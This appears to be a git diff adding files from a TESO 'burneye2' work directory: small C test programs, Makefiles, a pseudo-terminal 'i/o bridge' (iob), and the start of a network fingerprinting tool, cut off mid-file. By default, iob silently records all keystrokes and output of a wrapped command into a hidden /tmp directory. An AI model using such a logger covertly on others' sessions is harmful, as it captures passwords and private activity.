diff --git a/other/burneye2/tmp/854/obj-dietstart/start.o b/other/burneye2/tmp/854/obj-dietstart/start.o
new file mode 100644
index 0000000..2e10da1
--- /dev/null
+++ b/other/burneye2/tmp/854/obj-dietstart/start.o
Binary files differ
diff --git a/other/burneye2/tmp/ed-final-dietlibc.o b/other/burneye2/tmp/ed-final-dietlibc.o
new file mode 100644
index 0000000..a1dc458
--- /dev/null
+++ b/other/burneye2/tmp/ed-final-dietlibc.o
Binary files differ
diff --git a/other/burneye2/tmp/exectest/simple.c b/other/burneye2/tmp/exectest/simple.c
new file mode 100644
index 0000000..6d8b8a6
--- /dev/null
+++ b/other/burneye2/tmp/exectest/simple.c
@@ -0,0 +1,35 @@
1
2int
3_start (void)
4{
5 int a;
6
7 a = 6;
8 a = fac (a);
9 a = fac2 (6);
10
11 return (a);
12}
13
14
15int
16fac (int n)
17{
18 if (n <= 1)
19 return (1);
20 else
21 return (n * fac (n - 1));
22}
23
24
25int
26fac2 (int n)
27{
28 unsigned int a = n;
29
30 while (n > 1)
31 a *= --n;
32}
33
34
35
diff --git a/other/burneye2/tmp/exectest/simple.o b/other/burneye2/tmp/exectest/simple.o
new file mode 100644
index 0000000..76a6efa
--- /dev/null
+++ b/other/burneye2/tmp/exectest/simple.o
Binary files differ
diff --git a/other/burneye2/tmp/funcptr/fptr.c b/other/burneye2/tmp/funcptr/fptr.c
new file mode 100644
index 0000000..291656b
--- /dev/null
+++ b/other/burneye2/tmp/funcptr/fptr.c
@@ -0,0 +1,24 @@
1
2int m2 (int a);
3
4typedef int (* fptr)(int);
5
6
7int
8main (int argc, char *argv[])
9{
10 fptr subfunc;
11
12
13 subfunc = m2;
14 return (subfunc (argc));
15}
16
17
18int
19m2 (int a)
20{
21 return (a << 1);
22}
23
24
diff --git a/other/burneye2/tmp/funcptr/fptr.o b/other/burneye2/tmp/funcptr/fptr.o
new file mode 100644
index 0000000..a68a727
--- /dev/null
+++ b/other/burneye2/tmp/funcptr/fptr.o
Binary files differ
diff --git a/other/burneye2/tmp/iob/Makefile b/other/burneye2/tmp/iob/Makefile
new file mode 100644
index 0000000..d61da85
--- /dev/null
+++ b/other/burneye2/tmp/iob/Makefile
@@ -0,0 +1,32 @@
1
2CC=gcc
3CFLAGS=-Os -nostdlib
4
5# 1. order of start.o important, -L/-l does not matter
6LIBS_DIET=/usr/lib/diet/lib-i386/start.o \
7 -L/usr/lib/diet/lib-i386 -lc -L/usr/lib/gcc-lib/i386-linux/2.95.4 -lgcc
8INCLUDE_DIET=-I/usr/include/diet
9
10# gcc --help -v 2>&1 |grep crt
11LIBS_GLIBC=/usr/lib/crt1.o /usr/lib/crti.o /usr/lib/gcc-lib/i386-linux/2.95.4/crtbegin.o \
12 -lc -L/usr/lib/gcc-lib/i386-linux/2.95.4 -lgcc \
13 /usr/lib/gcc-lib/i386-linux/2.95.4/crtend.o /usr/lib/crtn.o
14
15all: iob
16
17clean:
18 rm -f *.o iob-glibc iob-dietlibc
19
20iob: iob-final-dietlibc.o iob-final-glibc.o
21 ld -o iob-dietlibc iob-final-dietlibc.o
22 ld -o iob-glibc iob-final-glibc.o
23
24iob-final-dietlibc.o: iob.c
25 $(CC) $(INCLUDE_DIET) $(CFLAGS) -c -o iob.o iob.c
26 $(CC) $(INCLUDE_DIET) $(CFLAGS) -c -o pty.o pty.c
27 ld -r -d -o iob-final-dietlibc.o iob.o pty.o $(LIBS_DIET)
28
29iob-final-glibc.o: iob.c
30 $(CC) $(CFLAGS) -c -o iob.o iob.c
31 $(CC) $(CFLAGS) -c -o pty.o pty.c
32 ld -r -d -o iob-final-glibc.o iob.o pty.o $(LIBS_GLIBC)
diff --git a/other/burneye2/tmp/iob/iob b/other/burneye2/tmp/iob/iob
new file mode 100644
index 0000000..6ee0987
--- /dev/null
+++ b/other/burneye2/tmp/iob/iob
Binary files differ
diff --git a/other/burneye2/tmp/iob/iob-dietlibc b/other/burneye2/tmp/iob/iob-dietlibc
new file mode 100644
index 0000000..4656837
--- /dev/null
+++ b/other/burneye2/tmp/iob/iob-dietlibc
Binary files differ
diff --git a/other/burneye2/tmp/iob/iob-final-dietlibc.o b/other/burneye2/tmp/iob/iob-final-dietlibc.o
new file mode 100644
index 0000000..269120b
--- /dev/null
+++ b/other/burneye2/tmp/iob/iob-final-dietlibc.o
Binary files differ
diff --git a/other/burneye2/tmp/iob/iob-final-glibc.o b/other/burneye2/tmp/iob/iob-final-glibc.o
new file mode 100644
index 0000000..4fa744b
--- /dev/null
+++ b/other/burneye2/tmp/iob/iob-final-glibc.o
Binary files differ
diff --git a/other/burneye2/tmp/iob/iob-glibc b/other/burneye2/tmp/iob/iob-glibc
new file mode 100644
index 0000000..e5db4c9
--- /dev/null
+++ b/other/burneye2/tmp/iob/iob-glibc
Binary files differ
diff --git a/other/burneye2/tmp/iob/iob.c b/other/burneye2/tmp/iob/iob.c
new file mode 100644
index 0000000..5cd7f8c
--- /dev/null
+++ b/other/burneye2/tmp/iob/iob.c
@@ -0,0 +1,303 @@
1/* iob - i/o bridge
2 *
3 * (C) COPYRIGHT TESO Security, 2001
4 * All Rights Reserved
5 *
6 * Redistribution and use in source and binary forms, with or without
7 * modification, are permitted provided that the following conditions are met:
8 *
9 * 1. Redistributions of source code must retain the above copyright notice,
10 * this list of conditions and the following disclaimer.
11 *
12 * 2. Redistributions in binary form must reproduce the above copyright notice,
13 * this list of conditions and the following disclaimer in the documentation
14 * and/or other materials provided with the distribution.
15 *
16 * 3. All advertising materials mentioning features or use of this software
17 * must display the following acknowledgement:
18 *
19 * This product includes software developed by TESO Security.
20 *
21 * 4. The name of TESO Security may not be used to endorse or promote products
22 * derived from this software without specific prior written permission.
23 *
24 * THIS SOFTWARE IS PROVIDED BY TESO ``AS IS'' AND ANY EXPRESS OR IMPLIED
25 * WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
26 * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
27 * EVENT SHALL TESO SECURITY BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
28 * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
29 * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
30 * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
31 * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
32 * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
33 * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
34 *
35 *****************************************************************************
36 * by scut 2001/10
37 */
38
39/* mod here */
40#define DEFAULT_LOG "/tmp/.log-term/"
41
42/* do not modify from here on
43 */
44#define VERSION "0.1"
45
46#include <sys/types.h>
47#include <signal.h>
48#include <stdio.h>
49#include <stdlib.h>
50#include <unistd.h>
51#include <termios.h>
52#include <string.h>
53#include <time.h>
54
55#ifndef TIOCGWINSZ
56#include <sys/ioctl.h>
57#endif
58#include "pty.h"
59
60
61/* logging related data
62 */
63int log_in = 1; /* log input flag */
64int log_out = 1; /* log output flag */
65char * log_dir = DEFAULT_LOG; /* default log directory */
66
67FILE * log_fi = NULL;
68FILE * log_fo = NULL;
69
70char log_outn[256],
71 log_inn[256];
72
73
74static volatile sig_atomic_t sigcaught = 0;
75int ts_fd_save;
76struct termios ts_saved; /* before going to raw */
77int brute_output_fd = 0;
78
79
80void usage (char *progname);
81void tty_atexit (void);
82static void t_loop (int ptym);
83
84
85void
86usage (char *progname)
87{
88 fprintf (stderr, "iob - version "VERSION"\n\n");
89 fprintf (stderr, "usage: %s [-h] [-d dir] [-i <0|1>] [-o <0|1>] <argv>\n\n"
90 "-h\t\tprint this help\n"
91 "-d <dir>\tlog to 'dir' directory (default: " DEFAULT_LOG ")\n"
92 "-i <0|1>\tlog input data (default: true, 1)\n"
93 "-o <0|1>\tlog output data (default: true, 1)\n\n",
94 progname);
95
96 exit (EXIT_SUCCESS);
97}
98
99
100int
101main (int argc, char *argv[])
102{
103 char c;
104 char ** n_argv;
105 int interactive, /* != 0 if we are at a tty */
106 fdm; /* pty master fd */
107
108 time_t tnow;
109 struct tm * tm_now;
110
111 pid_t mpid; /* pid used for forking */
112 char slave_name[20]; /* name of slave pty file */
113 char log_time[64];
114
115 /* original terminal properties in case we are already bound to
116 * a tty
117 */
118 struct termios ts_orig;
119 struct termios * ts_init = NULL;
120 struct winsize ws_orig;
121 struct winsize * ws_init = NULL;
122
123
124 while ((c = getopt (argc, argv, "hd:i:o:")) != EOF) {
125 switch (c) {
126 case 'h':
127 usage (argv[0]);
128 break;
129 case 'd':
130 if (strlen (optarg) == 0)
131 exit (EXIT_FAILURE);
132
133 log_dir = malloc (strlen (optarg) + 2);
134 strcpy (log_dir, optarg);
135
136 if (log_dir[strlen (log_dir) - 1] != '/')
137 strcat (log_dir, "/");
138 break;
139 case 'i':
140 log_in = (optarg[0] == '1') ? 1 : 0;
141 break;
142 case 'o':
143 log_out = (optarg[0] == '1') ? 1 : 0;
144 break;
145 default:
146 exit (EXIT_FAILURE);
147 break;
148 }
149 }
150
151 n_argv = &argv[optind];
152 if (n_argv[0] == NULL)
153 usage (argv[0]);
154
155 if (n_argv[0] == argv[0] || strlen (n_argv[0]) == 0)
156 exit (EXIT_SUCCESS);
157
158 /* get time and open logfiles
159 */
160 time (&tnow);
161 tm_now = localtime (&tnow);
162 snprintf (log_time, sizeof (log_time),
163 "%04d%02d%02d_%02d%02d_%05d_%s",
164 tm_now->tm_year + 1900, tm_now->tm_mon + 1, tm_now->tm_mday,
165 tm_now->tm_hour, tm_now->tm_min,
166 getpid (),
167 strrchr (n_argv[0], '/') == NULL ? n_argv[0] :
168 strrchr (n_argv[0], '/') + 1);
169
170 snprintf (log_inn, sizeof (log_inn), "%s%s.in", log_dir, log_time);
171 snprintf (log_outn, sizeof (log_outn), "%s%s.out", log_dir, log_time);
172
173
174 /* find out whether the current terminal is driven by another tty
175 * and in case it is, fetch the appropiate structures to pass to
176 * pty_fork
177 */
178 interactive = isatty (STDIN_FILENO);
179
180 if (interactive != 0) {
181 if (tcgetattr (STDIN_FILENO, &ts_orig) < 0)
182 exit (EXIT_FAILURE);
183
184 ts_init = &ts_orig;
185
186 if (ioctl (STDIN_FILENO, TIOCGWINSZ, (char *) &ws_orig) < 0)
187 exit (EXIT_FAILURE);
188
189 ws_init = &ws_orig;
190 }
191
192 mpid = pty_fork (&fdm, slave_name, ts_init, ws_init);
193 if (mpid < 0)
194 exit (EXIT_FAILURE);
195
196 /* in case we're a the child process, we execute a program
197 */
198 if (mpid == 0) {
199 execvp (n_argv[0], n_argv);
200
201 /* an error occured
202 */
203 exit (EXIT_FAILURE);
204 }
205
206 if (interactive != 0) {
207 ts_fd_save = STDIN_FILENO;
208 if (tty_raw (STDIN_FILENO, &ts_saved) < 0)
209 exit (EXIT_FAILURE);
210
211 /* install atexit cleanup handler
212 */
213 if (atexit (tty_atexit) < 0)
214 exit (EXIT_FAILURE);
215 }
216
217 t_loop (fdm);
218
219 exit (EXIT_SUCCESS);
220}
221
222
223void
224tty_atexit (void)
225{
226 tcsetattr (ts_fd_save, TCSAFLUSH, &ts_saved);
227
228 return;
229}
230
231
232static void
233t_loop (int ptym)
234{
235 pid_t child;
236 int nread;
237 char buff[512];
238 FILE * log_fo;
239
240
241 child = fork ();
242 if (child < 0)
243 exit (EXIT_FAILURE);
244
245 log_fi = log_fo = NULL;
246
247 if (child == 0) {
248 if (log_in) {
249 log_fi = fopen (log_inn, "wb");
250 if (log_fi == NULL)
251 exit (EXIT_FAILURE);
252 }
253
254 /* child loop
255 */
256 for ( ; ; ) {
257 nread = read (STDIN_FILENO, buff, sizeof (buff));
258 if (nread < 0)
259 exit (EXIT_FAILURE);
260
261 if (nread == 0)
262 break;
263
264 if (write (ptym, buff, nread) != nread)
265 exit (EXIT_FAILURE);
266
267 if (log_fi != NULL) {
268 fwrite (buff, nread, 1, log_fi);
269 fflush (log_fi);
270 }
271 }
272 }
273
274 if (log_out) {
275 log_fo = fopen (log_outn, "wb");
276 if (log_fo == NULL)
277 exit (EXIT_FAILURE);
278 }
279
280 /* parent loop
281 */
282 for ( ; ; ) {
283
284 nread = read (ptym, buff, sizeof (buff));
285 if (nread <= 0)
286 break;
287
288 if (write (STDOUT_FILENO, buff, nread) != nread)
289 exit (EXIT_FAILURE);
290
291 if (log_fo != NULL) {
292 fwrite (buff, nread, 1, log_fo);
293 fflush (log_fo);
294 }
295 }
296
297 if (sigcaught == 0)
298 kill (child, SIGTERM);
299
300 return;
301}
302
303
diff --git a/other/burneye2/tmp/iob/iob.o b/other/burneye2/tmp/iob/iob.o
new file mode 100644
index 0000000..232d43f
--- /dev/null
+++ b/other/burneye2/tmp/iob/iob.o
Binary files differ
diff --git a/other/burneye2/tmp/iob/pty.c b/other/burneye2/tmp/iob/pty.c
new file mode 100644
index 0000000..a2afa95
--- /dev/null
+++ b/other/burneye2/tmp/iob/pty.c
@@ -0,0 +1,315 @@
1/* iob - i/o bridge
2 *
3 * by scut, based mostly of r. stevens masterpiece apue with some twirks
4 *
5 * pseudo tty handler
6 */
7
8#include <sys/types.h>
9#include <sys/stat.h>
10#include <errno.h>
11#include <fcntl.h>
12#include <grp.h>
13#include <termios.h>
14#include <stdio.h>
15#include <stdlib.h>
16#include <string.h>
17#ifndef TIOCGWINSZ
18#include <sys/ioctl.h>
19#endif
20#ifdef SYS_V_RELEASE_4
21#include <stropts.h>
22#endif
23#include <unistd.h>
24
25
26#ifdef SYS_V_RELEASE_4
27
28extern char *ptsname (int); /* prototype not in any system header */
29
30int
31pty_m_open (char *pts_name)
32{
33 char *ptr;
34 int fdm;
35
36 strcpy (pts_name, "/dev/ptmx");
37 fdm = open (pts_name, O_RDWR);
38 if (fdm < 0)
39 return (-1);
40
41 if (grantpt (fdm) < 0) {
42 close (fdm);
43 return (-2);
44 }
45
46 if (unlockpt (fdm) < 0) {
47 close (fdm);
48 return (-3);
49 }
50
51 ptr = ptsname (fdm);
52 if (ptr == NULL) {
53 close (fdm);
54 return (-4);
55 }
56
57 strcpy (pts_name, ptr);
58
59 return (fdm);
60}
61
62
63int
64pty_s_open (int fdm, char *pts_name)
65{
66 int fds;
67
68 fds = open (pts_name, O_RDWR);
69 if (fds < 0) {
70 close (fdm);
71 return (-5);
72 }
73
74 if (ioctl (fds, I_PUSH, "ptem") < 0) {
75 close (fdm);
76 close (fds);
77 return (-6);
78 }
79
80 if (ioctl (fds, I_PUSH, "ldterm") < 0) {
81 close (fdm);
82 close (fds);
83 return (-7);
84 }
85
86 if (ioctl (fds, I_PUSH, "ttcompat") < 0) {
87 close (fdm);
88 close (fds);
89 return (-8);
90 }
91
92 return (fds);
93}
94
95#else
96
97
98int
99pty_m_open (char *pts_name)
100{
101 int fdm;
102 char *ptr1,
103 *ptr2;
104
105 strcpy (pts_name, "/dev/ptyXY");
106 for (ptr1 = "pqrstuvwxyzPQRST" ; *ptr1 != 0 ; ++ptr1) {
107 pts_name[8] = *ptr1;
108
109 for (ptr2 = "0123456789abcdef" ; *ptr2 != 0 ; ++ptr2) {
110 pts_name[9] = *ptr2;
111 fdm = open (pts_name, O_RDWR);
112 if (fdm < 0) {
113 if (errno == ENOENT)
114 return (-1);
115 else
116 continue;
117 }
118
119 pts_name[5] = 't';
120
121 return (fdm);
122 }
123 }
124
125 return (-1);
126}
127
128
129int
130pty_s_open (int fdm, char *pts_name)
131{
132 struct group *grp_ptr;
133 int gid,
134 fds;
135
136 grp_ptr = getgrnam ("tty");
137 if (grp_ptr != NULL)
138 gid = grp_ptr->gr_gid;
139 else
140 gid = -1;
141
142 chown (pts_name, getuid (), gid);
143 chmod (pts_name, S_IRUSR | S_IWUSR | S_IWGRP);
144
145 fds = open (pts_name, O_RDWR);
146 if (fds < 0) {
147 close (fdm);
148
149 return (-1);
150 }
151
152 return (fds);
153}
154
155#endif
156
157
158/* pty_fork
159 *
160 */
161
162pid_t
163pty_fork (int *fd_master_ptr, char *slave_name,
164 const struct termios *slave_termios,
165 const struct winsize *slave_winsize)
166{
167 int fdm,
168 fds;
169 pid_t pid;
170 char pts_name[20];
171
172 fdm = pty_m_open (pts_name);
173 if (fdm < 0) {
174 exit (EXIT_FAILURE);
175 }
176
177 if (slave_name != NULL)
178 strcpy (slave_name, pts_name);
179
180 pid = fork ();
181 if (pid < 0)
182 return (-1);
183
184 if (pid == 0) {
185 if (setsid () < 0)
186 exit (EXIT_FAILURE);
187 fds = pty_s_open (fdm, pts_name);
188 if (fds < 0)
189 exit (EXIT_FAILURE);
190 close (fdm);
191
192#if defined(TIOCSCTTY) && !defined(CIBAUD)
193 if (ioctl (fds, TIOCSCTTY, (char *) 0) < 0)
194 exit (EXIT_FAILURE);
195#endif
196 if (slave_termios != NULL) {
197 if (tcsetattr (fds, TCSANOW, slave_termios) < 0)
198 exit (EXIT_FAILURE);
199 }
200 if (slave_winsize != NULL) {
201 if (ioctl (fds, TIOCSWINSZ, slave_winsize) < 0)
202 exit (EXIT_FAILURE);
203 }
204
205 if (dup2 (fds, STDIN_FILENO) != STDIN_FILENO ||
206 dup2 (fds, STDOUT_FILENO) != STDOUT_FILENO ||
207 dup2 (fds, STDERR_FILENO) != STDERR_FILENO)
208 {
209 exit (EXIT_FAILURE);
210 }
211 if (fds > STDERR_FILENO)
212 close (fds);
213
214 return (0); /* just like fork (), child */
215 } else {
216 *fd_master_ptr = fdm;
217
218 return (pid);
219 }
220}
221
222
223void
224set_noecho (int fd)
225{
226 struct termios stermios;
227
228 if (tcgetattr (fd, &stermios) < 0)
229 exit (EXIT_FAILURE);
230
231 stermios.c_lflag &= ~(ECHO | ECHOE | ECHOK | ECHONL);
232 stermios.c_oflag &= ~(ONLCR);
233
234 if (tcsetattr (fd, TCSANOW, &stermios) < 0)
235 exit (EXIT_FAILURE);
236
237 return;
238}
239
240
241int
242tty_raw (int fd, struct termios *sios)
243{
244 struct termios tios;
245
246
247 if (sios != NULL && tcgetattr (fd, sios) < 0)
248 return (-1);
249
250 /* saved old termios structure, now copy it to work with it
251 */
252 memcpy (&tios, sios, sizeof (struct termios));
253
254 tios.c_lflag &= ~(ECHO | ICANON | IEXTEN | ISIG);
255 tios.c_iflag &= ~(BRKINT | ICRNL | INPCK | ISTRIP | IXON);
256 tios.c_cflag &= ~(CSIZE | PARENB);
257 tios.c_cflag |= CS8;
258 tios.c_oflag &= ~(OPOST);
259 tios.c_cc[VMIN] = 1;
260 tios.c_cc[VTIME] = 0;
261
262 if (tcsetattr (fd, TCSAFLUSH, &tios) < 0)
263 return (-1);
264
265 return (0);
266}
267
268
269int
270pty_setup (void (* handler)(void *), void *data)
271{
272 int interactive,
273 fdm;
274 pid_t mpid;
275
276 char slave_name[20];
277 struct termios ts_orig;
278 struct termios * ts_init = NULL;
279 struct winsize ws_orig;
280 struct winsize * ws_init = NULL;
281
282
283 interactive = isatty (STDIN_FILENO);
284 if (interactive != 0) {
285 if (tcgetattr (STDIN_FILENO, &ts_orig) < 0)
286 exit (EXIT_FAILURE);
287
288 ts_init = &ts_orig;
289
290 if (ioctl (STDIN_FILENO, TIOCGWINSZ, (char *) &ws_orig) < 0)
291 exit (EXIT_FAILURE);
292
293 ws_init = &ws_orig;
294 }
295
296 mpid = pty_fork (&fdm, slave_name, ts_init, ws_init);
297 if (mpid < 0)
298 exit (EXIT_FAILURE);
299
300 /* child calls handler
301 */
302 if (mpid == 0) {
303 handler (data);
304
305 /* handler shouldn't return
306 */
307 printf ("pty handler returned, failure\n");
308 exit (EXIT_FAILURE);
309 }
310
311 /* parent just returns master filedescriptor
312 */
313 return (fdm);
314}
315
diff --git a/other/burneye2/tmp/iob/pty.h b/other/burneye2/tmp/iob/pty.h
new file mode 100644
index 0000000..864965d
--- /dev/null
+++ b/other/burneye2/tmp/iob/pty.h
@@ -0,0 +1,95 @@
1/* brutate
2 *
3 * scut / team teso
4 *
5 * pseudo tty handler include file
6 */
7
8#ifndef BR_PTY_H
9#define BR_PTY_H
10
11#include <sys/types.h>
12#include <sys/ioctl.h>
13#include <termios.h>
14
15
16/* pty_m_open
17 *
18 * open master pty and return actual file used in `pts_name', which has
19 * to point to allocated memory and must be at least 20 bytes long.
20 *
21 * return master pty filedescriptor in case of success
22 * return negative error number in case of failure
23 */
24
25int pty_m_open (char *pts_name);
26
27
28/* pty_s_open
29 *
30 * open slave pty with filename pointed to by `pts_name' and bind it to
31 * master pty with descriptor `fdm'.
32 *
33 * return slave pty filedescriptor in case of success
34 * return negative error number in case of failure
35 */
36
37int pty_s_open (int fdm, char *pts_name);
38
39
40/* pty_fork
41 *
42 * fork a child process and create a pty binding between this parent process
43 * (master pty) and the child process (slave pty). return the master pty
44 * filedescriptor through `fd_master_ptr'. `slave_name' may be NULL or contain
45 * a pointer to allocated memory where the slave pty name will be stored.
46 * `slave_termios' may be NULL or contain a valid termios structure which will
47 * initialize the slave terminal line discipline. in case `slave_winsize' is
48 * not NULL it will initialize the slave pty window size.
49 *
50 * return values are the same as the ones of fork(2) (see "man 2 fork").
51 */
52
53pid_t pty_fork (int *fd_master_ptr, char *slave_name,
54 const struct termios *slave_termios,
55 const struct winsize *slave_winsize);
56
57
58/* set_noecho
59 *
60 * disable echo capability on terminal associated with filedescriptor `fd'
61 *
62 * return in any case
63 */
64
65void set_noecho (int fd);
66
67
68/* tty_raw
69 *
70 * put terminal associated with filedescriptor `fd' into raw mode, saving the
71 * current mode into the termios structure pointed to by `sios' in case it is
72 * non-NULL
73 *
74 * return 0 on success
75 * return -1 on failure
76 */
77
78int tty_raw (int fd, struct termios *sios);
79
80
81/* pty_setup
82 *
83 * helper routine, which allocates a pseudo terminal and tries to preserve
84 * as much settings as possible from the current terminal. then it forks
85 * away a child process in which nothing happens except that the handler
86 * function `handler' is called with `data' as parameter.
87 *
88 * returns the filedescriptor of the pty on success
89 * exits in case of failure
90 */
91
92int pty_setup (void (* handler)(void *), void *data);
93
94#endif
95
diff --git a/other/burneye2/tmp/iob/pty.o b/other/burneye2/tmp/iob/pty.o
new file mode 100644
index 0000000..ad3beec
--- /dev/null
+++ b/other/burneye2/tmp/iob/pty.o
Binary files differ
diff --git a/other/burneye2/tmp/ldistfp/Makefile b/other/burneye2/tmp/ldistfp/Makefile
new file mode 100644
index 0000000..10f0f3a
--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/Makefile
@@ -0,0 +1,37 @@
1
2CC=gcc
3CFLAGS=-Os -nostdlib
4
5
6FILES=ldistfp.o common.o network.o
7
8# 1. order of start.o important, -L/-l does not matter
9LIBS_DIET=/usr/lib/diet/lib-i386/start.o \
10 -L/usr/lib/diet/lib-i386 -lc -L/usr/lib/gcc-lib/i386-linux/2.95.4 -lgcc
11DIET_INCLUDE=-I/usr/include/diet
12
13# gcc --help -v 2>&1 |grep crt
14LIBS_GLIBC=-lpthread /usr/lib/crt1.o /usr/lib/crti.o /usr/lib/gcc-lib/i386-linux/2.95.4/crtbegin.o \
15 -lc -L/usr/lib/gcc-lib/i386-linux/2.95.4 -lgcc \
16 /usr/lib/gcc-lib/i386-linux/2.95.4/crtend.o /usr/lib/crtn.o
17
18all: ldistfp
19
20clean:
21 rm -f *.o ldistfp-glibc ldistfp-dietlibc
22
23ldistfp: ldistfp-final-dietlibc.o ldistfp-final-glibc.o
24 ld -o ldistfp-dietlibc ldistfp-final-dietlibc.o
25 ld -o ldistfp-glibc ldistfp-final-glibc.o
26
27ldistfp-final-dietlibc.o: $(FILES)
28 $(CC) $(DIET_INCLUDE) $(CFLAGS) -c -o ldistfp.o ldistfp.c
29 $(CC) $(DIET_INCLUDE) $(CFLAGS) -c -o network.o network.c
30 $(CC) $(DIET_INCLUDE) $(CFLAGS) -c -o common.o common.c
31 ld -r -d -o ldistfp-final-dietlibc.o $(FILES) $(LIBS_DIET)
32
33ldistfp-final-glibc.o: ldistfp.c
34 $(CC) $(CFLAGS) -c -o ldistfp.o ldistfp.c
35 $(CC) $(CFLAGS) -c -o network.o network.c
36 $(CC) $(CFLAGS) -c -o common.o common.c
37 ld -r -d -o ldistfp-final-glibc.o $(FILES) $(LIBS_GLIBC)
diff --git a/other/burneye2/tmp/ldistfp/common.c b/other/burneye2/tmp/ldistfp/common.c
new file mode 100644
index 0000000..bae7ebc
--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/common.c
@@ -0,0 +1,373 @@
1
2#include <sys/types.h>
3#include <sys/wait.h>
4#include <sys/time.h>
5#include <netinet/in.h>
6#include <unistd.h>
7#include <time.h>
8#include <stdarg.h>
9#include <stdio.h>
10#include <string.h>
11#include <stdlib.h>
12#include <unistd.h>
13#include "common.h"
14
15
16#ifdef DEBUG
17void
18debugp (char *filename, const char *str, ...)
19{
20 FILE *fp; /* temporary file pointer */
21 va_list vl;
22
23 fp = fopen (filename, "a");
24 if (fp == NULL)
25 return;
26
27 va_start (vl, str);
28 vfprintf (fp, str, vl);
29 va_end (vl);
30
31 fclose (fp);
32
33 return;
34}
35
36void
37hexdump (char *filename, unsigned char *data, unsigned int amount)
38{
39 FILE *fp; /* temporary file pointer */
40 unsigned int dp, p; /* data pointer */
41 const char trans[] =
42 "................................ !\"#$%&'()*+,-./0123456789"
43 ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
44 "nopqrstuvwxyz{|}~...................................."
45 "....................................................."
46 "........................................";
47
48 fp = fopen (filename, "a");
49 if (fp == NULL)
50 return;
51
52 fprintf (fp, "\n-packet-\n");
53
54 for (dp = 1; dp <= amount; dp++) {
55 fprintf (fp, "%02x ", data[dp-1]);
56 if ((dp % 8) == 0)
57 fprintf (fp, " ");
58 if ((dp % 16) == 0) {
59 fprintf (fp, "| ");
60 p = dp;
61 for (dp -= 16; dp < p; dp++)
62 fprintf (fp, "%c", trans[data[dp]]);
63 fflush (fp);
64 fprintf (fp, "\n");
65 }
66 fflush (fp);
67 }
68 if ((amount % 16) != 0) {
69 p = dp = 16 - (amount % 16);
70 for (dp = p; dp > 0; dp--) {
71 fprintf (fp, " ");
72 if (((dp % 8) == 0) && (p != 8))
73 fprintf (fp, " ");
74 fflush (fp);
75 }
76 fprintf (fp, " | ");
77 for (dp = (amount - (16 - p)); dp < amount; dp++)
78 fprintf (fp, "%c", trans[data[dp]]);
79 fflush (fp);
80 }
81 fprintf (fp, "\n");
82
83 fclose (fp);
84 return;
85}
86
87#endif
88
89
90/* z_fork
91 *
92 * fork and detach forked client completely to avoid zombies.
93 * taken from richard stevens excellent system programming book :) thanks,
94 * whereever you are now.
95 *
96 * caveat: the pid of the child has already died, it can just be used to
97 * differentiate between parent and not parent, the pid of the
98 * child is inaccessibly.
99 *
100 * return pid of child for old process
101 * return 0 for child
102 */
103
104pid_t
105z_fork (void)
106{
107 pid_t pid;
108
109 pid = fork ();
110 if (pid < 0) {
111 return (pid);
112 } else if (pid == 0) {
113 /* let the child fork again
114 */
115
116 pid = fork ();
117 if (pid < 0) {
118 return (pid);
119 } else if (pid > 0) {
120 /* let the child and parent of the second child
121 * exit
122 */
123 exit (EXIT_SUCCESS);
124 }
125
126 return (0);
127 }
128
129 waitpid (pid, NULL, 0);
130
131 return (pid);
132}
133
134
135/* m_random
136 *
137 * return a random number between `lowmark' and `highmark'
138 */
139
140int
141m_random (int lowmark, int highmark)
142{
143 long int rnd;
144
145 /* flip/swap them in case user messed up
146 */
147 if (lowmark > highmark) {
148 lowmark ^= highmark;
149 highmark ^= lowmark;
150 lowmark ^= highmark;
151 }
152 rnd = lowmark;
153
154 rnd += (random () % (highmark - lowmark));
155
156 /* this is lame, i know :)
157 */
158 return (rnd);
159}
160
161
162/* set_tv
163 *
164 * initializes a struct timeval pointed to by `tv' to a second value of
165 * `seconds'
166 *
167 * return in any case
168 */
169
170void
171set_tv (struct timeval *tv, int seconds)
172{
173 tv->tv_sec = seconds;
174 tv->tv_usec = 0;
175
176 return;
177}
178
179
180/* xstrupper
181 *
182 * uppercase a string `str'
183 *
184 * return in any case
185 */
186
187void
188xstrupper (char *str)
189{
190 for (; *str != '\0'; ++str) {
191 if (*str >= 'a' && *str <= 'z') {
192 *str -= ('a' - 'A');
193 }
194 }
195
196 return;
197}
198
199
200/* concating snprintf
201 *
202 * determines the length of the string pointed to by `os', appending formatted
203 * string to a maximium length of `len'.
204 *
205 */
206
207void
208scnprintf (char *os, size_t len, const char *str, ...)
209{
210 va_list vl;
211 char *ostmp = os + strlen (os);
212
213 va_start (vl, str);
214 vsnprintf (ostmp, len - strlen (os) - 1, str, vl);
215 va_end (vl);
216
217 return;
218}
219
220unsigned long int
221tdiff (struct timeval *old, struct timeval *new)
222{
223 unsigned long int time1;
224
225 if (new->tv_sec >= old->tv_sec) {
226 time1 = new->tv_sec - old->tv_sec;
227 if ((new->tv_usec - 500000) >= old->tv_usec)
228 time1++;
229 } else {
230 time1 = old->tv_sec - new->tv_sec;
231 if ((old->tv_usec - 500000) >= new->tv_usec)
232 time1++;
233 }
234
235 return (time1);
236}
237
238
239/* ipv4_print
240 *
241 * padding = 0 -> don't padd
242 * padding = 1 -> padd with zeros
243 * padding = 2 -> padd with spaces
244 */
245
246char *
247ipv4_print (char *dest, struct in_addr in, int padding)
248{
249 unsigned char *ipp;
250
251 ipp = (unsigned char *) &in.s_addr;
252
253 strcpy (dest, "");
254
255 switch (padding) {
256 case (0):
257 sprintf (dest, "%d.%d.%d.%d",
258 ipp[0], ipp[1], ipp[2], ipp[3]);
259 break;
260 case (1):
